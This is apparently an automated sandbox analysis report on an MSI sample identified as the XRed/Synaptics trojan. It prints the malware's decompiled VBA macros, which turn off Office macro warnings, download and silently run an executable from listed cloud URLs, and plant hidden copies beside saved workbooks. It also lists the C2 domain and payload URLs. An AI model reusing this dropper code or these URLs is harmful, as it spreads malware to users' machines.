Windows
Analysis Report
valyzt.msi
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w11x64_office
- msiexec.exe (PID: 7892 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\Desktop\ valyzt.msi " MD5: C0D3BDDE74C1EC82F75681D4D5ED44C8)
- cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XRed | Yara detected XRed | Joe Security | ||
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Networking |
---|
Source: | URLs: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | OLE, VBA macro: | Name: SaveAsInj | ||
Source: | OLE, VBA macro: | Name: RegKeyRead | ||
Source: | OLE, VBA macro: | Name: RegKeyExists | ||
Source: | OLE, VBA macro: | Name: RegKeySave | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: FDW | ||
Source: | OLE, VBA macro: | Name: FDW |
Source: | OLE, VBA macro: | Name: FDW |
Source: | OLE, VBA macro: | Name: FDW |
Source: | OLE, VBA macro: | Name: Workbook_Open | ||
Source: | OLE, VBA macro: | Name: Workbook_BeforeClose |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File source: |
Source: | ReversingLabs: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Static file information: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 31 Scripting | 1 Replication Through Removable Media | Windows Management Instrumentation | 31 Scripting | 1 DLL Side-Loading | 1 DLL Side-Loading | OS Credential Dumping | 1 Peripheral Device Discovery | Remote Services | Data from Local System | 2 Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
66% | ReversingLabs | Win32.Trojan.Synaptics |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1582346 |
Start date and time: | 2024-12-30 11:41:02 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 28 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | valyzt.msi |
Detection: | MAL |
Classification: | mal80.troj.expl.winMSI@1/0@0/0 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 4.175.87.197, 20.199.58.43, 40.126.32.133
- Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, x1.c.lencr.org, ocsp.digicert.com, login.live.com, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, c.pki.goog
- Not all processes where analyzed, report is missing behavior information
- VT rate limit hit for: valyzt.msi
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
fp2e7a.wpc.phicdn.net | Get hash | malicious | XRed | Browse |
| |
Get hash | malicious | ScreenConnect Tool | Browse |
| ||
Get hash | malicious | Python Stealer, Creal Stealer | Browse |
| ||
Get hash | malicious | Nitol, Zegost | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CobaltStrike, Metasploit | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Credential Flusher | Browse |
|
File type: | |
Entropy (8bit): | 7.422118768157554 |
TrID: |
|
File name: | valyzt.msi |
File size: | 1'748'992 bytes |
MD5: | 53614b87538306b4f7437db8be2a0e47 |
SHA1: | a6a777b24bb64067738386caa66787b8ed225726 |
SHA256: | e86d059bd44bc6e4252972320cb811497ea87f3b0ef10eed5edfcd7acf44a3d8 |
SHA512: | cfed71c6b9eb55b3ebfb53cbdb1611e8921a6dbe7b7efc5456cebb9bfb3d6a64f23a97c63415d61c38c4e3b540a79fd50cb2a080220bf3ea32edc98f85e6ecc1 |
SSDEEP: | 49152:PElnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZl:Gnsmtk2a1hlPERBsiT |
TLSH: | C985C0B2B3818436D433563C8C7B93A75427BE5D1D38690E3BE57E4E6E3A34228261D7 |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
Icon Hash: | bdb5fdd8b3b39b1f |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 30, 2024 11:41:52.283139944 CET | 1.1.1.1 | 192.168.2.24 | 0xd705 | No error (0) | fp2e7a.wpc.phicdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Dec 30, 2024 11:41:52.283139944 CET | 1.1.1.1 | 192.168.2.24 | 0xd705 | No error (0) | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
Target ID: | 1 |
Start time: | 05:41:57 |
Start date: | 30/12/2024 |
Path: | C:\Windows\System32\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b7e50000 |
File size: | 176'128 bytes |
MD5 hash: | C0D3BDDE74C1EC82F75681D4D5ED44C8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Call Graph
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Sayfa1
Declaration
Line | Content |
---|---|
1 | Attribute VB_Name = "Sayfa1" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
Module: ThisWorkbook
Declaration
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisWorkbook" |
2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Dim SheetsChanged as Boolean |
10 | Dim SheetCount as Integer |
APIs | Meta Information |
---|---|
CreateObject | |
Path | |
ActiveWorkbook | |
Path | |
ActiveWorkbook | |
Environ | |
FileExists | |
FileExists | |
FileCopy | |
Shell | |
vbHide | |
FileExists | |
FileExists | |
FileCopy | |
Shell | |
vbHide | |
FileExists | |
Environ | |
Shell | |
Environ | |
vbHide | |
FileExists | |
Environ | |
Shell | |
Environ | |
vbHide | |
FileExists | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: AllowRedirects | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Send | |
Part of subcall function FDW@ThisWorkbook: Status | |
Part of subcall function FDW@ThisWorkbook: InStr | |
Part of subcall function FDW@ThisWorkbook: ResponseText | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Type | |
Part of subcall function FDW@ThisWorkbook: Write | |
Part of subcall function FDW@ThisWorkbook: ResponseBody | |
Part of subcall function FDW@ThisWorkbook: SaveToFile | |
Part of subcall function FDW@ThisWorkbook: Close | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: AllowRedirects | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Send | |
Part of subcall function FDW@ThisWorkbook: Status | |
Part of subcall function FDW@ThisWorkbook: InStr | |
Part of subcall function FDW@ThisWorkbook: ResponseText | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Type | |
Part of subcall function FDW@ThisWorkbook: Write | |
Part of subcall function FDW@ThisWorkbook: ResponseBody | |
Part of subcall function FDW@ThisWorkbook: SaveToFile | |
Part of subcall function FDW@ThisWorkbook: Close | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: AllowRedirects | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Send | |
Part of subcall function FDW@ThisWorkbook: Status | |
Part of subcall function FDW@ThisWorkbook: InStr | |
Part of subcall function FDW@ThisWorkbook: ResponseText | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Type | |
Part of subcall function FDW@ThisWorkbook: Write | |
Part of subcall function FDW@ThisWorkbook: ResponseBody | |
Part of subcall function FDW@ThisWorkbook: SaveToFile | |
Part of subcall function FDW@ThisWorkbook: Close | |
FileExists | |
Shell | |
vbHide | |
Shell | |
vbHide |
Strings | Decrypted Strings |
---|---|
"scripting.filesystemobject" | |
"https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download" | |
"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
"Temp" | |
"ALLUSERSPROFILE" | |
"ALLUSERSPROFILE" | |
"WINDIR" | |
"WINDIR" |
Line | Instruction | Meta Information |
---|---|---|
147 | Sub MPS() | |
148 | Dim FSO as Object | |
149 | Dim FP(1 To 3), TMP, URL(1 To 3) as String | |
151 | Set FSO = CreateObject("scripting.filesystemobject") | CreateObject |
152 | FP(1) = ActiveWorkbook.Path & "\~$cache1" | Path ActiveWorkbook |
153 | FP(2) = ActiveWorkbook.Path & "\Synaptics.exe" | Path ActiveWorkbook |
155 | URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download" | |
156 | URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
157 | URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
158 | TMP = Environ("Temp") & "\~$cache1.exe" | Environ |
160 | If FSO.FileExists(FP(1)) Then | FileExists |
161 | If Not FSO.FileExists(TMP) Then | FileExists |
162 | FileCopy FP(1), TMP | FileCopy |
163 | Endif | |
164 | Shell TMP, vbHide | Shell vbHide |
165 | Elseif FSO.FileExists(FP(2)) Then | FileExists |
166 | If Not FSO.FileExists(TMP) Then | FileExists |
167 | FileCopy FP(2), TMP | FileCopy |
168 | Endif | |
169 | Shell TMP, vbHide | Shell vbHide |
170 | Else | |
171 | If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then | FileExists Environ |
172 | Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide | Shell Environ vbHide |
173 | Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then | FileExists Environ |
174 | Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide | Shell Environ vbHide |
175 | Elseif Not FSO.FileExists(TMP) Then | FileExists |
176 | If FDW((URL(1)), (TMP)) Then | |
177 | Elseif FDW((URL(2)), (TMP)) Then | |
178 | Elseif FDW((URL(3)), (TMP)) Then | |
179 | Endif | |
180 | If FSO.FileExists(TMP) Then | FileExists |
181 | Shell TMP, vbHide | Shell vbHide |
182 | Endif | |
183 | Else | |
184 | Shell TMP, vbHide | Shell vbHide |
185 | Endif | |
187 | Endif | |
189 | End Sub |
APIs | Meta Information |
---|---|
Sheets | |
Sheets | |
xlSheetVisible | |
Part of subcall function RegKeySave@ThisWorkbook: CreateObject | |
Part of subcall function RegKeySave@ThisWorkbook: RegWrite | |
Version | |
Part of subcall function RegKeySave@ThisWorkbook: CreateObject | |
Part of subcall function RegKeySave@ThisWorkbook: RegWrite | |
Version | |
DisplayAlerts | |
Count | |
Worksheets | |
Part of subcall function MPS@ThisWorkbook: CreateObject | |
Part of subcall function MPS@ThisWorkbook: Path | |
Part of subcall function MPS@ThisWorkbook: ActiveWorkbook | |
Part of subcall function MPS@ThisWorkbook: Path | |
Part of subcall function MPS@ThisWorkbook: ActiveWorkbook | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileCopy | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileCopy | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Select |
Strings | Decrypted Strings |
---|---|
"HKCU\Software\Microsoft\Office\" | |
"REG_DWORD" | |
"HKCU\Software\Microsoft\Office\" | |
"REG_DWORD" |
Line | Instruction | Meta Information |
---|---|---|
12 | Private Sub Workbook_Open() | |
13 | Dim i as Integer | |
14 | For i = 1 To ActiveWorkbook.Sheets.Count | Sheets |
15 | ActiveWorkbook.Sheets(i).Visible = xlSheetVisible | Sheets xlSheetVisible |
16 | Next i | Sheets |
18 | RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD" | Version |
19 | RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD" | Version |
21 | Application.DisplayAlerts = False | DisplayAlerts |
22 | SheetCount = Worksheets.Count | Count Worksheets |
24 | Call MPS() | |
26 | ActiveWorkbook.Sheets(1).Select | Select |
27 | SheetsChanged = False | |
28 | End Sub |
APIs | Meta Information |
---|---|
CreateObject | |
CreateObject | |
Option | |
Option | |
AllowRedirects | |
Open | |
Send | |
Status | |
InStr | |
ResponseText | |
CreateObject | |
Open | |
Type | |
Write | |
ResponseBody | |
SaveToFile | |
Close |
Strings | Decrypted Strings |
---|---|
"WinHttp.WinHttpRequest.5.1" | |
"WinHttp.WinHttpRequest.5" | |
"WinHttp.WinHttpRequest.5" | |
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" | |
"GET" | |
"404 Not Found" | |
">Not Found<" | |
"ADODB.Stream" | |
"Dropbox - Error" | |
"404 Not Found" | |
">Not Found<" | |
"ADODB.Stream" | |
"Dropbox - Error" | |
"ADODB.Stream" |
Line | Instruction | Meta Information |
---|---|---|
191 | Function FDW(MYU, NMA as String) as Boolean | |
192 | Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1") | CreateObject |
193 | If WinHttpReq Is Nothing Then | |
194 | Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5") | CreateObject |
195 | Endif | |
197 | WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" | Option |
198 | WinHttpReq.Option(6) = AllowRedirects | Option AllowRedirects |
199 | WinHttpReq.Open "GET", MYU, False | Open |
200 | WinHttpReq.Send | Send |
202 | If (WinHttpReq.Status = 200) Then | Status |
203 | If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then | InStr ResponseText |
204 | FDW = True | |
205 | Set oStream = CreateObject("ADODB.Stream") | CreateObject |
206 | oStream.Open | Open |
207 | oStream.Type = 1 | Type |
208 | oStream.Write WinHttpReq.ResponseBody | Write ResponseBody |
209 | oStream.SaveToFile (NMA) | SaveToFile |
210 | oStream.Close | Close |
211 | Else | |
212 | FDW = False | |
213 | Endif | |
214 | Else | |
215 | FDW = False | |
216 | Endif | |
217 | End Function |
APIs | Meta Information |
---|---|
CreateObject | |
Environ | |
FileExists | |
FileExists | |
FileCopy | |
SetAttr | |
vbHidden | |
vbSystem |
Strings | Decrypted Strings |
---|---|
"scripting.filesystemobject" | |
"ALLUSERSPROFILE" |
Line | Instruction | Meta Information |
---|---|---|
102 | Sub SaveAsInj(DIR as String) | |
103 | Dim FSO as Object | |
104 | Dim FN as String | |
106 | Set FSO = CreateObject("scripting.filesystemobject") | CreateObject |
107 | FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe" | Environ |
109 | If FSO.FileExists(FN) Then | FileExists |
110 | If Not FSO.FileExists(DIR & "\~$cache1") Then | FileExists |
111 | FileCopy FN, DIR & "\~$cache1" | FileCopy |
112 | Endif | |
113 | SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem | SetAttr vbHidden vbSystem |
114 | Endif | |
115 | End Sub |
APIs | Meta Information |
---|---|
CreateObject | |
RegRead |
Strings | Decrypted Strings |
---|---|
"WScript.Shell" |
Line | Instruction | Meta Information |
---|---|---|
125 | Function RegKeyExists(i_RegKey as String) as Boolean | |
126 | Dim myWS as Object | |
128 | On Error Goto ErrorHandler | |
129 | Set myWS = CreateObject("WScript.Shell") | CreateObject |
130 | myWS.RegRead i_RegKey | RegRead |
131 | RegKeyExists = True | |
132 | Exit Function | |
133 | ErrorHandler: | |
135 | RegKeyExists = False | |
136 | End Function |
APIs | Meta Information |
---|---|
CreateObject | |
RegRead |
Strings | Decrypted Strings |
---|---|
"WScript.Shell" |
Line | Instruction | Meta Information |
---|---|---|
117 | Function RegKeyRead(i_RegKey as String) as String | |
118 | Dim myWS as Object | |
120 | On Error Resume Next | |
121 | Set myWS = CreateObject("WScript.Shell") | CreateObject |
122 | RegKeyRead = myWS.RegRead(i_RegKey) | RegRead |
123 | End Function |
APIs | Meta Information |
---|---|
CreateObject | |
RegWrite |
Strings | Decrypted Strings |
---|---|
"WScript.Shell" |
Line | Instruction | Meta Information |
---|---|---|
138 | Sub RegKeySave(i_RegKey as String, i_Value as String, optional i_Type as String = "REG_SZ") | |
141 | Dim myWS as Object | |
143 | Set myWS = CreateObject("WScript.Shell") | CreateObject |
144 | myWS.RegWrite i_RegKey, i_Value, i_Type | RegWrite |
145 | End Sub |
APIs | Meta Information |
---|---|
Saved |
Line | Instruction | Meta Information |
---|---|---|
30 | Private Sub Workbook_BeforeClose(Cancel as Boolean) | |
31 | If Not SheetsChanged Then | |
32 | ActiveWorkbook.Saved = True | Saved |
33 | Endif | |
34 | End Sub |
APIs | Meta Information |
---|---|
ActiveSheet | |
EnableEvents | |
ScreenUpdating | |
Sheets | |
Sheets | |
xlSheetHidden | |
Save | |
Sheets | |
Sheets | |
xlSheetVisible | |
Select | |
ScreenUpdating | |
EnableEvents | |
EnableEvents | |
ScreenUpdating | |
Sheets | |
Sheets | |
xlSheetHidden | |
GetSaveAsFilename | |
SaveAs | |
xlOpenXMLWorkbookMacroEnabled | |
Part of subcall function SaveAsInj@ThisWorkbook: CreateObject | |
Part of subcall function SaveAsInj@ThisWorkbook: Environ | |
Part of subcall function SaveAsInj@ThisWorkbook: FileExists | |
Part of subcall function SaveAsInj@ThisWorkbook: FileExists | |
Part of subcall function SaveAsInj@ThisWorkbook: FileCopy | |
Part of subcall function SaveAsInj@ThisWorkbook: SetAttr | |
Part of subcall function SaveAsInj@ThisWorkbook: vbHidden | |
Part of subcall function SaveAsInj@ThisWorkbook: vbSystem | |
Path | |
Sheets | |
Sheets | |
xlSheetVisible | |
Select | |
ScreenUpdating | |
EnableEvents |
Strings | Decrypted Strings |
---|---|
"Excel \xc7al\x0131\x015fma Kitab\x0131 (*.xlsm), *.xlsm" |
Line | Instruction | Meta Information |
---|---|---|
51 | Private Sub Workbook_BeforeSave(ByVal SaveAsUI as Boolean, Cancel as Boolean) | |
52 | Dim i as Integer | |
53 | Dim AIndex as Integer | |
54 | Dim FName | |
56 | AIndex = ActiveWorkbook.ActiveSheet.Index | ActiveSheet |
58 | If SaveAsUI = False Then | |
59 | Cancel = True | |
60 | Application.EnableEvents = False | EnableEvents |
61 | Application.ScreenUpdating = False | ScreenUpdating |
63 | For i = 1 To ActiveWorkbook.Sheets.Count - 1 | Sheets |
64 | ActiveWorkbook.Sheets(i).Visible = xlSheetHidden | Sheets xlSheetHidden |
65 | Next i | Sheets |
66 | ActiveWorkbook.Save | Save |
68 | For i = 1 To ActiveWorkbook.Sheets.Count | Sheets |
69 | ActiveWorkbook.Sheets(i).Visible = xlSheetVisible | Sheets xlSheetVisible |
70 | Next i | Sheets |
71 | ActiveWorkbook.Sheets(AIndex).Select | Select |
72 | SheetsChanged = False | |
74 | Application.ScreenUpdating = True | ScreenUpdating |
75 | Application.EnableEvents = True | EnableEvents |
76 | Else | |
77 | Cancel = True | |
78 | Application.EnableEvents = False | EnableEvents |
79 | Application.ScreenUpdating = False | ScreenUpdating |
81 | For i = 1 To ActiveWorkbook.Sheets.Count - 1 | Sheets |
82 | ActiveWorkbook.Sheets(i).Visible = xlSheetHidden | Sheets xlSheetHidden |
83 | Next i | Sheets |
85 | FName = Application.GetSaveAsFilename(fileFilter := "Excel \xc7al\x0131\x015fma Kitab\x0131 (*.xlsm), *.xlsm") | GetSaveAsFilename |
86 | If FName <> False Then | |
87 | ActiveWorkbook.SaveAs Filename := FName, FileFormat := xlOpenXMLWorkbookMacroEnabled | SaveAs xlOpenXMLWorkbookMacroEnabled |
88 | SaveAsInj ActiveWorkbook.Path | Path |
89 | Endif | |
91 | For i = 1 To ActiveWorkbook.Sheets.Count | Sheets |
92 | ActiveWorkbook.Sheets(i).Visible = xlSheetVisible | Sheets xlSheetVisible |
93 | Next i | Sheets |
94 | ActiveWorkbook.Sheets(AIndex).Select | Select |
95 | SheetsChanged = False | |
97 | Application.ScreenUpdating = True | ScreenUpdating |
98 | Application.EnableEvents = True | EnableEvents |
99 | Endif | |
100 | End Sub |
APIs | Meta Information |
---|---|
Sheets | |
ActiveWorkbook | |
Sheets | |
ActiveWorkbook |
Line | Instruction | Meta Information |
---|---|---|
44 | Private Sub Workbook_SheetActivate(ByVal Sh as Object) | |
45 | If ActiveWorkbook.Sheets.Count <> SheetCount Then | Sheets ActiveWorkbook |
46 | SheetsChanged = True | |
47 | SheetCount = ActiveWorkbook.Sheets.Count | Sheets ActiveWorkbook |
48 | Endif | |
49 | End Sub |
Line | Instruction | Meta Information |
---|---|---|
36 | Private Sub Workbook_SheetChange(ByVal Sh as Object, ByVal Target as Range) | |
37 | SheetsChanged = True | |
38 | End Sub |
Line | Instruction | Meta Information |
---|---|---|
40 | Private Sub Workbook_NewSheet(ByVal Sh as Object) | |
41 | SheetsChanged = True | |
42 | End Sub |